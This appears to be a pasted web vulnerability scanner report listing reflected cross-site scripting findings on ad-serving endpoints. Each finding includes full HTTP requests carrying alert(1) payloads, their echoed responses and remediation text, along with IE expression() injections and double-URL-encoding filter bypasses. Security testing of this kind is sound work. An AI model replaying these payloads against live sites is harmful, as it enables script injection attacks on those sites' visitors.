Host: http://vulnerable.verizon.host
Path: /adi/N3995.275551.SYMPATICOCANADA/B5002719
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2d6"-alert(1)-"3d73acd9ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6687
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... =1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1http%3a%2f%2fwww.hotels.ca/hotel-deals/SLMcoupon_mms-444"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d262"-alert(1)-"96f8deb7f41 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6657
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... e=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41http://www.hotels.ca/hotel-deals/SLMcoupon_mms-444"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = " ...[SNIP]...
2.14. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://vulnerable.verizon.host
Path: /adi/N6080.149339.8804879051621/B4137193.79
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aec59"-alert(1)-"5a20f033947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 19 Nov 2010 23:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6742
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=&aec59"-alert(1)-"5a20f033947=1http%3a%2f%2flp.21st.com/sp/%3Fpid%3D10486EYBDWK"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c1c1"-alert(1)-"afd3afa7698 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 19 Nov 2010 23:26:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6714
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=9c1c1"-alert(1)-"afd3afa7698http://lp.21st.com/sp/?pid=10486EYBDWK"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4db8c'-alert(1)-'76a9a340a18 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85571'-alert(1)-'e0c602a890c was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d7b'-alert(1)-'549109f08e8 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.19. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://vulnerable.verizon.host
Path: /adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a860'-alert(1)-'40e767fbc22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f99'-alert(1)-'151cd29a63c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b0aa'-alert(1)-'df99fff59 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9448d'-alert(1)-'fc0bfd338ee was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c063b'-alert(1)-'67246c81f2f was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68e3'-alert(1)-'7c564df6c49 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f627'-alert(1)-'38dd3681b12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 442a2'-alert(1)-'cd57e5a21a7 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87703'-alert(1)-'a236e466c18 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83023"%3balert(1)//6bee66d0b85 was submitted in the h parameter. This input was echoed as 83023";alert(1)//6bee66d0b85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/83023"%3balert(1)//6bee66d0b85 HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response (redirected)
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 03:33:59 GMT
Connection: close
<html> <script type="text/javascript"> function processAdClickUrl() { window.top.location.replace("83023";alert(1)//6bee66d0b85?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAI ...[SNIP]...
2.29. http://vulnerable.verizon.host/click [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://vulnerable.verizon.host
Path: /click
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f1fe"%3balert(1)//424e902531b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f1fe";alert(1)//424e902531b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/&2f1fe"%3balert(1)//424e902531b=1 HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response (redirected)
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 03:34:10 GMT
Connection: close
<html> <script type="text/javascript"> function processAdClickUrl() { window.top.location.replace("&2f1fe";alert(1)//424e902531b=1?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAA ...[SNIP]...
The value of the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934 was submitted in the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter. This input was echoed as df4be"style="x:expression(alert(1))"f02ba6ee934 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-dealsdf4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2 was submitted in the cnt parameter. This input was echoed as beb2f"style="x:expression(alert(1))"1aa717214d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /clk;210955744;24466695;s?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PRObeb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of the gcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc was submitted in the gcid parameter. This input was echoed as 8c66e"style="x:expression(alert(1))"9cd31f2b2bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-deals&gcid=C11287x6388c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cead%2522%253balert%25281%2529%252f%252f70bc5b86024 was submitted in the REST URL parameter 2. This input was echoed as 5cead";alert(1)//70bc5b86024 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead%2522%253balert%25281%2529%252f%252f70bc5b86024/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead";alert(1)//70bc5b86024/1354.0.iframe.200x33/1290209587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb was submitted in the REST URL parameter 2. This input was echoed as 99764"><script>alert(1)</script>e90710d87cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135799764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
